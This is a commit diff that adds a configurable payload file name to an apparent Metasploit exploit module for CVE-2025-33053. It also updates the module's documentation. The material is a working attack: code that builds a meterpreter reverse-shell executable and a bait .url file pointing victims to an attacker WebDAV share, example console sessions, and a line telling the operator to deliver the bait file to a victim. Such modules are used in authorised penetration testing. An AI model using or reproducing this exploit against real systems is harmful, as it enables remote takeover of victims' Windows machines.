Add some features and fix bugs for CVE-2025-33053 exploit module

DevBuiHieu · DevBuiHieu · commit 20b8a9fcd3a3 · 2025-06-17T22:59:34.000-04:00
diff --git a/documentation/modules/exploit/windows/fileformat/cve_2025_33053.md b/documentation/modules/exploit/windows/fileformat/cve_2025_33053.md
@@ -64,6 +64,10 @@ It supports:
 
 Whether to generate payload and move to WebDAV directory (default: true)
 
+### PAYLOAD_NAME
+
+Output payload file name (default: route.exe)
+
 ### START_LISTENER
 
 Whether to auto-start a Metasploit multi/handler (default: true)
@@ -104,46 +108,49 @@ You can use this module in:
 
 ## Example Usage
 
-```console
+```
 use exploits/windows/fileformat/cve_2025_33053
 set LHOST 192.168.1.10
 run
-```console
+```
 
 Optional:
 
-```console
+```
 set WEBDAV_DIR /var/www/webdav
 set OUTFILE clickme.url
 set PAYLOAD windows/x64/meterpreter/reverse_http
 run
-```console
+```
 
 ## Output
 
+```
 msf6 > use exploit/windows/fileformat/cve_2025_33053
 [*] Using configured payload windows/x64/meterpreter/reverse_tcp
 msf6 exploit(windows/fileformat/cve_2025_33053) > set LHOST 192.168.1.15
 LHOST => 192.168.1.15
-msf6 exploit(windows/fileformat/cve_2025_33053) > run
+msf6 exploit(windows/fileformat/cve_2025_33053) > exploit
 [*] Started reverse TCP handler on 192.168.1.15:4444 
 [*] Creating WebDAV directory if not exists...
-[+] Generating payload at: /var/www/webdav/payload.exe
-[+] Payload successfully written to /var/www/webdav/payload.exe
-[+] .URL file written to: /home/kali/bait.url
-[*] Module complete. Deliver /home/kali/bait.url to victim.
+[*] Generating payload...
+[+] Payload successfully written to /var/www/webdav/route.exe
+[*] Generating .URL file...
+[+] .URL file written to: bait.url
+[*] Module complete. Deliver /home/kali/metasploit-framework/bait.url to victim.
+```
 
 Example .url file:
 
-```console
+```
 [InternetShortcut]
 URL=C:\Program Files\Internet Explorer\iediagcmd.exe
 WorkingDirectory=\\192.168.1.10\webdav\
 ShowCommand=7
 IconIndex=13
 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 Modified=20F06BA06D07BD014D
-```console
+```
 
 ## References
 
diff --git a/modules/exploits/windows/fileformat/cve_2025_33053.rb b/modules/exploits/windows/fileformat/cve_2025_33053.rb
@@ -38,6 +38,7 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
+        OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
         OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
         OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
         OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
@@ -74,7 +75,7 @@ def prepare_webdav_dir
   def generate_payload_if_needed
     return unless datastore['GEN_PAYLOAD']
 
-    exe_path = File.join(datastore['WEBDAV_DIR'], 'payload.exe')
+    exe_path = File.join(datastore['WEBDAV_DIR'], datastore['PAYLOAD_NAME'])
     print_status('Generating payload...')
     generate_payload_exe(datastore['PAYLOAD'], datastore['LHOST'], datastore['LPORT'], exe_path)
   end
